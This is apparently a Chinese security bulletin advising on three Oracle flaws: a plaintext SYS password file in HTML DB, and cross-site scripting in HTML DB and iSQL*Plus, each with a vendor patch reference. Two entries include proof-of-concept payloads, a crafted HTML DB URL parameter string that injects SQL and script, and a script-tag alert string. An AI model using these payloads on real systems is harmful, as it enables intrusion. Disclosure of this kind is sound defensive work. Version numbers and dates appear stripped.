Oracle HTML DB明文口令存储漏洞
发布日期
更新日期
受影响系统
Oracle HTML DB
Oracle HTML DB
Oracle HTML DB
Oracle HTML DB
描述
BUGTRAQID:
Oracle是一款大型的商业数据库系统Oracle HTML DB是Oracle数据库的快速web应用开发工具
Oracle HTML DB中存在明文存储口令漏洞在手动安装时应用程序在文件系统中以明文文件存储SYS用户的口令本地攻击者可以访问这个文件并检索到口令获得管理权限访问
<*来源Alexander Kornbrust (ak@redd)
链接
*>
建议
临时解决方法
手动删除installlst文件
厂商补丁
Oracle
Oracle已经为此发布了一个安全公告(cpujul)以及相应补丁:
cpujulCritical Patch Update July
链接
Oracle HTML DB跨站脚本漏洞
发布日期
更新日期
受影响系统
Oracle HTML DB
Oracle HTML DB
Oracle HTML DB
Oracle HTML DB
描述
BUGTRAQID:
Oracle是一款大型的商业数据库系统Oracle HTML DB是Oracle数据库的快速web应用开发工具
HTML DB中存在一些跨站脚本漏洞起因是没有正确的验证用户输入攻击者可以利用这些漏洞通过向HTML DB用户发送特制的HTMLDB url在数据库中执行SQL语句
<*来源Alexander Kornbrust (ak@redd)
链接
*>
测试方法
警 告
以下程序(方法)可能带有攻击性仅供安全研究与教学之用使用者风险自负!
(okie);:
&p_page_submission_id=&p_request=RUN&p_arg_names=&p_t=KORNBRUST&p_arg_names=&p_t=selectsysdate||alert(||sysdate||); fromdual%B&p_arg_names=&p_t=&p_arg_names=&p_t=&p_arg_names=&p_t=&p_arg_names=&p_t=&p_arg_names=&p_t=&p_arg_names=&p_t=&p_arg_names=&p_t=&p_md_checksum=
建议
厂商补丁
Oracle
Oracle已经为此发布了一个安全公告(cpujul)以及相应补丁:
cpujulCritical Patch Update July
链接
Oracle iSQLPlus跨站脚本漏洞
发布日期
更新日期
受影响系统
Oracle Database i Release
描述
BUGTRAQID:
Oracle是一款大型的商业数据库系统Oracle iSQL*Plus是SQL*Plus的WEB界面
Oracle iSQL*Plus中存在跨站脚本漏洞起因是没有正确的验证用户输入攻击者可以利用这个漏洞在用户浏览器中执行任意脚本代码
<*来源Alexander Kornbrust (ak@redd)
链接
*>
测试方法
警 告
以下程序(方法)可能带有攻击性仅供安全研究与教学之用使用者风险自负!
以scott用户登录//myserver/isqlplus )
设置HTML TABLE标记 ><script>alert(okie);</script>
选择表格(如从cat选择*)
==> 这时会弹出窗口
建议
厂商补丁
Oracle
Oracle已经为此发布了一个安全公告(cpujul)以及相应补丁:
cpujulCritical Patch Update July
链接
